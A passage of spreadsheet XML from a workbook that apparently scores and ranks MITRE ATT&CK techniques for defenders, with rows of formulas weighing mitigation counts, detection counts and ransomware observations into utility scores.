        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I365">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J365">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K365">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L365">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M365" s="25">
        <v>0</v>
      </c>
      <c r="N365" s="51">
        <v>0</v>
      </c>
      <c r="O365" s="51">
        <v>2</v>
      </c>
      <c r="P365" s="51">
        <v>0</v>
      </c>
      <c r="Q365" s="51">
        <v>0</v>
      </c>
      <c r="R365" s="53" t="s">
        <v>156</v>
      </c>
      <c r="S365" s="51">
        <v>2</v>
      </c>
      <c r="T365" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U365" s="51">
        <v>7</v>
      </c>
      <c r="V365" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="W365">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X365">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y365">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z365">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>2</v>
      </c>
      <c r="AA365">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.02</v>
      </c>
      <c r="AB365">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.02</v>
      </c>
      <c r="AC365" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD365" s="25" t="str" cm="1">
        <f t="array" ref="AD365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC365)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE365" s="25">
        <f>IF(AD365="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF365" s="25" t="str" cm="1">
        <f t="array" ref="AF365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC365)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG365" s="25">
        <f>IF(AF365="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH365" s="25" t="str" cm="1">
        <f t="array" ref="AH365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC365)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI365" s="25">
        <f>IF(AH365="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ365" s="25" t="str" cm="1">
        <f t="array" ref="AJ365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC365)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK365" s="25">
        <f>IF(AJ365="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL365" s="25" t="str" cm="1">
        <f t="array" ref="AL365">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC365)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM365" s="25">
        <f>IF(AL365="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN365" s="59">
        <v>0</v>
      </c>
      <c r="AO365" s="51">
        <v>0</v>
      </c>
      <c r="AP365" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.3389523809523808E-2</v>
      </c>
      <c r="AQ365" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.7965079365079362E-2</v>
      </c>
      <c r="AR365" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.7965079365079362E-2</v>
      </c>
      <c r="AS365" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT365" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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66" spans="1:47" ht="32.1">
      <c r="A366" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0789047619047621E-2</v>
      </c>
      <c r="B366" s="25">
        <f>SUM(H366,M366,V366)*(1+SUM(AE366,AG366,AI366,AK366,AM366))</f>
        <v>0.40789047619047619</v>
      </c>
      <c r="C366" s="25" t="s">
        <v>1450</v>
      </c>
      <c r="D366" s="25" t="s">
        <v>1451</v>
      </c>
      <c r="E366" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F366" s="51">
        <v>3</v>
      </c>
      <c r="G366" s="51">
        <v>2</v>
      </c>
      <c r="H366" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I366">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J366">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K366">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L366">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M366" s="25">
        <v>0</v>
      </c>
      <c r="N366" s="51">
        <v>0</v>
      </c>
      <c r="O366" s="51">
        <v>0</v>
      </c>
      <c r="P366" s="51">
        <v>1</v>
      </c>
      <c r="Q366" s="51">
        <v>0</v>
      </c>
      <c r="R366" s="52" t="s">
        <v>1452</v>
      </c>
      <c r="S366" s="51">
        <v>2</v>
      </c>
      <c r="T366" s="51" t="s">
        <v>1453</v>
      </c>
      <c r="U366" s="51">
        <v>7</v>
      </c>
      <c r="V366" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W366">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X366">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y366">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z366">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA366">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB366">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC366" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD366" s="25" t="str" cm="1">
        <f t="array" ref="AD366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC366)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE366" s="25">
        <f>IF(AD366="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF366" s="25" t="str" cm="1">
        <f t="array" ref="AF366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC366)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG366" s="25">
        <f>IF(AF366="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH366" s="25" t="str" cm="1">
        <f t="array" ref="AH366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC366)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI366" s="25">
        <f>IF(AH366="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ366" s="25" t="str" cm="1">
        <f t="array" ref="AJ366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC366)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK366" s="25">
        <f>IF(AJ366="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL366" s="25" t="str" cm="1">
        <f t="array" ref="AL366">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC366)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM366" s="25">
        <f>IF(AL366="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN366" s="52">
        <v>0</v>
      </c>
      <c r="AO366" s="51">
        <v>0</v>
      </c>
      <c r="AP366" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.0789047619047621E-2</v>
      </c>
      <c r="AQ366" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.13596349206349206</v>
      </c>
      <c r="AR366" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.13596349206349206</v>
      </c>
      <c r="AS366" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT366" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU36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67" spans="1:47">
      <c r="A367" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.22156190476190477</v>
      </c>
      <c r="B367" s="25">
        <f>SUM(H367,M367,V367)*(1+SUM(AE367,AG367,AI367,AK367,AM367))</f>
        <v>0.21561904761904763</v>
      </c>
      <c r="C367" s="25" t="s">
        <v>1454</v>
      </c>
      <c r="D367" s="25" t="s">
        <v>148</v>
      </c>
      <c r="E367" s="25" t="s">
        <v>1455</v>
      </c>
      <c r="F367" s="51">
        <v>1</v>
      </c>
      <c r="G367" s="51">
        <v>1</v>
      </c>
      <c r="H367" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I367">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J367">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K367">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L367">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M367" s="25">
        <v>0</v>
      </c>
      <c r="N367" s="51">
        <v>0</v>
      </c>
      <c r="O367" s="51">
        <v>1</v>
      </c>
      <c r="P367" s="51">
        <v>0</v>
      </c>
      <c r="Q367" s="51">
        <v>0</v>
      </c>
      <c r="R367" s="53" t="s">
        <v>149</v>
      </c>
      <c r="S367" s="51">
        <v>5</v>
      </c>
      <c r="T367" s="51" t="s">
        <v>1456</v>
      </c>
      <c r="U367" s="51">
        <v>4</v>
      </c>
      <c r="V367" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W367">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X367">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y367">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z367">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA367">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB367">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC367" s="29" t="s">
        <v>122</v>
      </c>
      <c r="AD367" s="25" t="str" cm="1">
        <f t="array" ref="AD367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC367)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE367" s="25">
        <f>IF(AD367="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF367" s="25" t="str" cm="1">
        <f t="array" ref="AF367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC367)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG367" s="25">
        <f>IF(AF367="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH367" s="25" t="str" cm="1">
        <f t="array" ref="AH367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC367)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI367" s="25">
        <f>IF(AH367="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ367" s="25" t="str" cm="1">
        <f t="array" ref="AJ367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC367)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK367" s="25">
        <f>IF(AJ367="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL367" s="25" t="str" cm="1">
        <f t="array" ref="AL367">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC367)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM367" s="25">
        <f>IF(AL367="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN367" s="58">
        <v>6</v>
      </c>
      <c r="AO367" s="51">
        <v>1</v>
      </c>
      <c r="AP367" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.22156190476190477</v>
      </c>
      <c r="AQ367" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.187301587301588E-2</v>
      </c>
      <c r="AR367" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.187301587301588E-2</v>
      </c>
      <c r="AS367" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT367" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU36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68" spans="1:47" ht="32.1">
      <c r="A368" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6152380952380954E-2</v>
      </c>
      <c r="B368" s="25">
        <f>SUM(H368,M368,V368)*(1+SUM(AE368,AG368,AI368,AK368,AM368))</f>
        <v>0.22819047619047617</v>
      </c>
      <c r="C368" s="25" t="s">
        <v>1457</v>
      </c>
      <c r="D368" s="25" t="s">
        <v>302</v>
      </c>
      <c r="E368" s="25" t="s">
        <v>1458</v>
      </c>
      <c r="F368" s="51">
        <v>1</v>
      </c>
      <c r="G368" s="51">
        <v>1</v>
      </c>
      <c r="H368" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I368">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J368">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K368">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L368">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M368" s="25">
        <v>0</v>
      </c>
      <c r="N368" s="51">
        <v>0</v>
      </c>
      <c r="O368" s="51">
        <v>1</v>
      </c>
      <c r="P368" s="51">
        <v>0</v>
      </c>
      <c r="Q368" s="51">
        <v>0</v>
      </c>
      <c r="R368" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S368" s="51">
        <v>2</v>
      </c>
      <c r="T368" s="51" t="s">
        <v>303</v>
      </c>
      <c r="U368" s="51">
        <v>7</v>
      </c>
      <c r="V368" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W368">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X368">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y368">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Z368">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>1</v>
      </c>
      <c r="AA368">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.01</v>
      </c>
      <c r="AB368">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.01</v>
      </c>
      <c r="AC368" s="29" t="s">
        <v>206</v>
      </c>
      <c r="AD368" s="25" t="str" cm="1">
        <f t="array" ref="AD368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC368)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE368" s="25">
        <f>IF(AD368="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF368" s="25" t="str" cm="1">
        <f t="array" ref="AF368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC368)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG368" s="25">
        <f>IF(AF368="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH368" s="25" t="str" cm="1">
        <f t="array" ref="AH368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC368)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI368" s="25">
        <f>IF(AH368="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ368" s="25" t="str" cm="1">
        <f t="array" ref="AJ368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC368)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK368" s="25">
        <f>IF(AJ368="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL368" s="25" t="str" cm="1">
        <f t="array" ref="AL368">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC368)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM368" s="25">
        <f>IF(AL368="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN368" s="60">
        <v>1</v>
      </c>
      <c r="AO368" s="51">
        <v>1</v>
      </c>
      <c r="AP368" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6152380952380954E-2</v>
      </c>
      <c r="AQ368" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.6063492063492055E-2</v>
      </c>
      <c r="AR368" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.6063492063492055E-2</v>
      </c>
      <c r="AS368" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT368" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU36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69" spans="1:47">
      <c r="A369" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>5.6152380952380954E-2</v>
      </c>
      <c r="B369" s="25">
        <f>SUM(H369,M369,V369)*(1+SUM(AE369,AG369,AI369,AK369,AM369))</f>
        <v>0.22819047619047617</v>
      </c>
      <c r="C369" s="25" t="s">
        <v>1459</v>
      </c>
      <c r="D369" s="25" t="s">
        <v>202</v>
      </c>
      <c r="E369" s="25" t="s">
        <v>1460</v>
      </c>
      <c r="F369" s="51">
        <v>1</v>
      </c>
      <c r="G369" s="51">
        <v>1</v>
      </c>
      <c r="H369" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I369">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J369">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K369">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L369">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M369" s="25">
        <v>0</v>
      </c>
      <c r="N369" s="51">
        <v>0</v>
      </c>
      <c r="O369" s="51">
        <v>1</v>
      </c>
      <c r="P369" s="51">
        <v>0</v>
      </c>
      <c r="Q369" s="51">
        <v>0</v>
      </c>
      <c r="R369" s="51" t="s">
        <v>1461</v>
      </c>
      <c r="S369" s="51">
        <v>2</v>
      </c>
      <c r="T369" s="52" t="s">
        <v>1462</v>
      </c>
      <c r="U369" s="51">
        <v>7</v>
      </c>
      <c r="V369" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>9.0476190476190474E-2</v>
      </c>
      <c r="W369">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>9</v>
      </c>
      <c r="X369">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.16363636363636364</v>
      </c>
      <c r="Y369">
